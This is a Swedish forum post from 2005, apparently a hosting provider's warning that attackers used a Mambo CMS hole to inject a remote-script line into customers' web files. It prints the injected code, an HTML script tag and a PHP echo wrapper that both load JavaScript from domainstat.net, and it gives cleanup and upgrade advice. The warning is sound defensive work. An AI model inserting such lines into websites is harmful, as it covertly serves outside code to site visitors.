Raden ser ut så här:
<script language='JavaScript' type='text/javascript'> src='http://domainstat.net/stat.php'></script>
Eller så här:
<? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>
Dessa rader har en hackare lagt till pga ett säkerhetshål för bla. Mambo-scriptet. Raden bidrar till att sidan inte vill ladda direkt, utan står och väntar.
Mappar med "777" som inställd mapprättighet kan också drabbas.
- Vi uppmanar alla som INTE drabbats av detta att omedelbart uppgradera sina Mambo-script eller andra script som Ni använder på Era konton.
- Ni som drabbats, försök använda ett "rensnings program" som kan rensa bort den oönskade raden. Ladda hem kopior på de drabbade filerna, och låt programmet ta bort "extra raden" och ladda upp de modifierade filerna igen till Ert konto.
Ett program som kan användas är: A.F.9
Fler script kan vara drabbade, (bla. Wordpress & Gallery) eftersom det just nu verkar vara många säkerhetshål som hittas - så var snälla och sök igenom Era konton efter ändringar eller om "Domainstat" vill ladda när Ni besöker Er hemsida.
Detta inlägg har redigerats av Erik: 09 december 2005 - 18:08